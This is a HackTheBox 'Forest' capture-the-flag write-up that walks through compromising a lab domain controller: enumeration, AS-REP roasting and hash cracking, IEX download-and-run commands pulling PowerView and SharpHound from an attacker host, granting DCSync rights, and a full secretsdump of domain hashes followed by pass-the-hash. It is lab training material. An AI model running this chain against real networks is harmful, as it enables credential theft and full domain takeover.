Forest - HackTheBox
I started by doing a scan with Nmap to detect open ports and services on the machine.
ββ[root@parrot]β[/home/wackyhacker/Desktop]
ββββΌ nmap -sS --min-rate=5000 --open -v -n 10.10.10.161 -oN targeted
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 15:58 CEST
Initiating Ping Scan at 15:58
Scanning 10.10.10.161 [4 ports]
Completed Ping Scan at 15:58, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:58
Scanning 10.10.10.161 [1000 ports]
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Completed SYN Stealth Scan at 15:58, 0.42s elapsed (1000 total ports)
Nmap scan report for 10.10.10.161
Host is up (0.086s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
Raw packets sent: 1243 (54.668KB) | Rcvd: 1099 (44.000KB)
Seeing that it was a Domain Controller I launched the enum4linux tool to do a machine recognition, I saw that I could list domain users, to do it in a more comfortable way I used the s4vitar tool, rpcenum.
ββ[root@parrot]β[/home/wackyhacker/Desktop]
ββββΌ ./rpcenum -e DUsers -i 10.10.10.161
[*] Enumerating Domain Users...
+ +
| Users |
+ +
| Administrator |
| Guest |
| krbtgt |
| DefaultAccount |
| $331000-VK4ADACQNUCA |
| SM_2c8eef0a09b545acb |
| SM_ca8c2ed5bdab4dc9b |
| SM_75a538d3025e4db9a |
| SM_681f53d4942840e18 |
| SM_1b41c9286325456bb |
| SM_9b69f1b9d2cc45549 |
| SM_7c96b981967141ebb |
| SM_c75ee099d0a64c91b |
| SM_1ffab36a2f5f479cb |
| HealthMailboxc3d7722 |
| HealthMailboxfc9daad |
| HealthMailboxc0a90c9 |
| HealthMailbox670628e |
| HealthMailbox968e74d |
| HealthMailbox6ded678 |
| HealthMailbox83d6781 |
| HealthMailboxfd87238 |
| HealthMailboxb01ac64 |
| HealthMailbox7108a4e |
| HealthMailbox0659cc1 |
| sebastien |
| lucinda |
| svc-alfresco |
| andy |
| mark |
| feel |
| aliasnoname |
+ +
I managed to find a series of users, I entered them in a .txt file.
I tried to do an ASREPRoast attack, dumping an unauthenticated net NTLM v2 hash with credentials to the kerberos protocol and it worked.
ββ[root@parrot]β[/home/wackyhacker/Desktop]
ββββΌ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -format john -no-pass -k -usersfile users.txt -dc-ip 10.10.10.161 HTB.LOCAL/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$svc-alfresco@HTB.LOCAL:23afd64cd88e624b32bd7d23c79a3dc 6$d47730e650f2dc81097c6b86ec7603325a2851902530c1968ace2d6c2858e4be e5092ffb1cd0769dece363e835dac58341a376da2a4169dec1278f869f7ff8731e 02ac421d90058e9b69144986d86f700671ad1d95adbf8f4e88c33f5a7d19566c59 a93ea1122aac2a3d107b7843efd584fa21c9a44cf31ce82d27f4d780a6e72159cb70297ddda75ed2b837bab2f59f9dadf60480c598d923fa02fb1816c3e48fe83e5e1d09c0f253bdd922cc05ac051b53089eafae89557d5be89f4d8d1a3ffa7bd81fc0821b643e4fa3380c3a378c892c5bf83d10da2a47af988dad163c140b0f5da73bbe
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User aliasnoname doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] invalid principal syntax
I managed to get the net NTLM v2 hash from the user svc-alfresco, this hash was not useful for pass the hash but I could crack it by brute force, for this I used the john the ripper tool.
ββ[root@parrot]β[/home/wackyhacker/Desktop]
ββββΌ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$svc-alfresco@HTB.LOCAL)
1g 0:00:00:08 DONE (2021-07-28 16:02) 0.1210g/s 494644p/s 494644c/s 494644C/s s3xirexi..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
I managed to crack it and was able to authenticate through evil-winrm.
I was now able to view the userβs βflagβ.
ESCALADA DE PRIVILEGIOS
For the privilege escalation I used BloodHound to see the vector in the form of nodes, I transferred SharpHound, the BloodHound data collector, I made the transfer with the following Powershell command having a python server open on port 80.
IEX(New-Object Net.WebClient).downloadString('http://10.10.16.18/SharpHound.ps1')
I created the zip with SharpHound containing .json files and transferred it to my computer by creating a share with smb and supporting version two of smb.
Importe el zip a BloodHound
Once loaded it showed me the attack vector for escalation.
I saw that the user was part of the "Exchange Windows Permissions" group, I also found that the writeDACL rights could grant DCSync permissions to our user, meaning that he could modify the ACL and do a DCSync attack, before adding our user to the "Exchange Windows Permissions group I'm going to transfer PowerView.ps1 to be able to carry out the attack, for this I used the following command with a python server running on port 80`.
IEX(New-Object Net.WebClient).downloadString("http://10.10.16.18/PowerView.ps1")
Now I added the user to the "Exchange Windows Permission" group with the following command.
net group "Exchange Windows Permission" svc-alfresco /add /domain
And I grant DCSync permissions to the svc-alfresco user with the following commands.
pass = convertto-securestring 's3rvice' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity svc-alfresco -Rights DCSync
With secretdumps.py I managed to dump the usersβ NTLM hashes.
ββ[root@parrot]β[/home/wackyhacker/Desktop]
ββββΌ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05::: htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a::: htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9::: htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555::: htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5::: htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff::: htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203::: htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355::: htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536::: htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
nandu143:7602:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
zarrius:7603:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:9fa7b3a466d7f60bdea20508ad0cce8b:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:f00989c52e7023d887eeef842edf8914bbb6454b7758b2f06e3ddba54a04fea9
htb.local\andy:aes128-cts-hmac-sha1-96:06b8232f7de3a1326f39bb879d0a3654
htb.local\andy:des-cbc-md5:23ba0d0b40fed56b
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
nandu143:aes256-cts-hmac-sha1-96:8a77a9d28cc5eccd4406b81fc81a5fd7fcbcb94d71b3722da96ce25cdc15b675
nandu143:aes128-cts-hmac-sha1-96:b281bede93f7a2479cd7ffa85c55b972
nandu143:des-cbc-md5:fe5b7f6b5d5b6115
zarrius:aes256-cts-hmac-sha1-96:996715fddf27e9b99d7e90dd345b7d5e0ce4e25dc247c260299c4b5c09e90e74
zarrius:aes128-cts-hmac-sha1-96:f0be6d6d5c56731461018c87c4f7f14f
zarrius:des-cbc-md5:b0f858ea0462195d
FOREST$:aes256-cts-hmac-sha1-96:ecef71035db507605eec52e1944e25bd7f693caa5c190bc04e02e9c5e4d4a887
FOREST$:aes128-cts-hmac-sha1-96:30f8191f116ea008f7ce511707d8ae47
FOREST$:des-cbc-md5:f7cbc48364ba79c4
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
I did pass the hash with wmiexec using the NTLM hash of the Administrator user and achieved maximum privileges.
I was now able to view the root flag
Leave a comment